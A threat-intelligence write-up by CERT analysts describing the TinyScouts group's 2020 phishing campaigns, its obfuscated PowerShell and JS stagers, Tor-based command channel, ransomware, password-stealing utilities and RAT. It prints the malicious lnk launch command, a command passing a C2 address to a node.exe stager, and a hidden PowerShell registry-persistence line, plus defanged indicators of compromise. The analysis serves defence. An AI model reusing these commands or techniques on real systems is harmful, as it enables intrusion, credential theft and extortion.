Slightly Harder Than It Looks: How TinyScouts Attack

7 min

Some time ago, we started recording attempts to infect our customers’ infrastructures with previously unknown malware. It was delivered to users through phishing emails, sometimes dedicated to the second wave of coronavirus, and sometimes – clearly “sharpened” for the attacked organization and related to its activities. The intruders pretended to be various existing companies, for example, Norilsk Nickel, the Russian Union of Industrialists and Entrepreneurs, Finauditservice, etc.

Two aspects of the group’s activities were noteworthy: first, the high level of technical skills of the attackers, and second, the variability of the attack scenario. If you are not interesting as a victim, they will steal passwords and encrypt data, but if your machine is in an interesting domain and has the potential for a more interesting attack development, they will download the Remote Admin Tool (RAT) written in PowerShell. We named the grouping TinyScouts after the names of the functions from the malicious code. In this article, we will tell you about her last two campaigns, which can be conditionally divided by months – July and August 2020, and we will do a full analysis of TinyScouts tools and scripts.

July campaign. Direct download

In July, the malware was distributed in the form of an lnk file that executed the following command:

% comspec% / v / c set m = m ^ s ^ h ^ ta && set a = AKT-F ^ inAudit ^ Service. ^ docx.l ^ nk && if exist “! cd! ! a!” (! m! “! cd! ! a!”) else (! m!! temp! Temp1_A ^ ktWe ^ pki.z ^ ip ! a!)

As a result of running mshta.exe, the obfuscated JS script was executed. Its task is to extract a document from the body of the lnk file for distraction, open it through rundll32.exe and run the obfuscated PowerShell command. A fragment of the script after deobfuscation is shown below:

The script in the toexecute variable downloads and runs another obfuscated PowerShell script named Decide (request to decide.php). An example of obfuscation is below:

The task of this script is to check the computer for compliance with some parameters and download the next load from the servers. A snippet of the deobfuscated code is shown below:

The presence of TeamViewer, RDP sessions and the fact of logging into the domain are checked in order to determine what load needs to be downloaded. In the case of an “interesting” system, the RAT is loaded, otherwise – the encryptor. In both cases, these are scripts obfuscated in several layers.

August Campaign (ongoing). Tor Hidden Services

In early August, the distribution scheme changed: now the letters contained a link to download the sfx archive, which contains 4 files:

• document.doc. A document that is opened for distraction and does not carry a malicious payload.
• 7za.exe. 7z – archiver.
• wget.exe. The original wget utility.
• service. JS script Stager 1

When starting the sfx archive, the following actions take place:

1) opens document.doc
2) using wget and 7z, TOR and node.exe are downloaded and unpacked from the following links:

3) the Stager 1 script is launched using node.exe:
C: Windows System32 cmd.exe “/ c if not exist hostname (node ​​service 192.248[.]165.254)

Below is the deobfuscated Stager 1 script:

The service script receives the address of the control server as an argument and, when launched, creates the TOR Hidden Service ( It is worth noting that when the hidden TOR service is launched, its name is generated (it is similar to the name of a regular resource in the TOR network, for example, vkss134jshs22yl3li2ul.onion). Next, the script sends the generated Hidden Service name to the attacker and brings up the local web server. Subsequently, the attacker communicates with the infected system in the request / response mode to the web server (line 19 in the code), where the requests contain the code for execution, and the responses contain the results.

This architecture allows an attacker to gain access to an infected system, even if it is behind NAT (the main condition is the presence of the Internet), and makes it unnecessary to know the victim’s “white” IP address.

The first request to the raised web server comes the Decider script, whose task is to determine the fact of the computer joining the domain, as well as to obtain the username. This time, the TeamViewer and RDP checks are missing:

After the results of the Decider script are sent to the attacker, a web request is sent to the infected system containing either the ransomware or RAT, depending on the attacker’s interest.

Common modules in both campaigns

Stager 3 script

The main script contains 5 components encoded in base64:
• Encryptor ransomware
• Readme file with a message from intruders
• WebBrowserPassView utility
• Mail PassView utility
• Injector. Executable file used to inject WebBrowserPassView and Mail PassView into svchost process. Injection is done with the usual RunPE method.

Stager 3 script functions:

1) Launching the ransomware (Get-Stuff function)
Below is a fragment of the script code with the launch of the ransomware:

2) Bypass UAC (to remove shadow copies)
There are three techniques in the code: using csmtp.exe, CompMgmtLauncher.exe, and fodhelper.exe. You can read about them here, here and here

3) Removing shadow copies

4) Launching WebBrowserPassView and Mail PassView
These are utilities from Nirsoft for extracting passwords from browsers and email clients, respectively.

5) Sending reports of the aforementioned utilities to the management server.
Before sending, reports are encrypted with RC4 algorithm with a generated key (4 characters):

The key itself is placed at the beginning of the message:

Encryptor ransomware

The readme message looks like this:

The ransomware is a .NET executable file without any obfuscation. Files are encrypted with the AES algorithm. A separate key and initialization vector is generated for each file, which is then encrypted using the RSA public key and placed in the encrypted file. The main function of the ransomware is shown below:


This script has several layers of obfuscation. After decryption, it can execute the following commands:
delete – self-removal
exec – executing a PowerShell command
download – file upload
set_wait_time – change the frequency of command request
update_tiny – RAT update
run_module – execute a block of PowerShell commands
add_persist_module – add a PowerShell module to the system, which will be executed each time the RAT is started.
remote_persist_module – remove the module from the RAT startup list.

The deobfuscated command processing function is shown below:

Fixing method

Two keys are used to secure:

1) HKCU SOFTWARE Microsoft Windows CurrentVersion Run. The following command is placed in this key (the line is deobfuscated):
cmd / c PowerShell -windowstyle hidden -nop -c “iex (Get-ItemProperty -Path HKCU: SOFTWARE Microsoft Windows -Name

2) HKCU SOFTWARE Microsoft Windows. This is where the script is stored in a value named client_id. Thus, when the system starts, the command from the Run key reads and runs the script from here.
client_id – AppX + base64 format string (hostname + username + campaign_id)

The pinning function looks like this:

Decrypted script that is placed in Run:

It is worth noting that the malware code is not stored either on disk or in the registry: each time it is loaded anew by the above script.

Add_persist_module command

RAT has the ability to add PowerShell modules that will run on every startup. For this, a separate registry key is used, which stores module identifiers. During startup, this key is checked, and the malware makes a request to the server, downloading all modules by their identifiers.

When the malware starts, the Load-AllPersistModules function is launched to launch all added modules:

The module code is also not stored either on disks or in the registry, like the main body of the RAT.

Server interactions

The code contains the CampaignID constant, which is used when registering the RAT at startup (register-tiny function) as the encryption key. The encryption algorithm is RC4. After sending the primary information about the system, the server response contains the encryption key, which will be used in the future with the same algorithm.

Indicators of Compromise:

https[://]late-salad-2839.yriqwzjskbbg.workers[.]dev / raw_stat / stat_launch.php
https[://]late-salad-2839.yriqwzjskbbg.workers[.]dev / raw_stat / stat_fin.php
https[://]late-salad-2839.yriqwzjskbbg.workers[.]dev / web / index.php? r = bag

Post authors:
Igor Zalevsky, Head of Cyber ​​Incidents Investigation Department, JSOC CERT
Asker Jamirze, JSOC CERT Technical Investigation Expert


Leave a Reply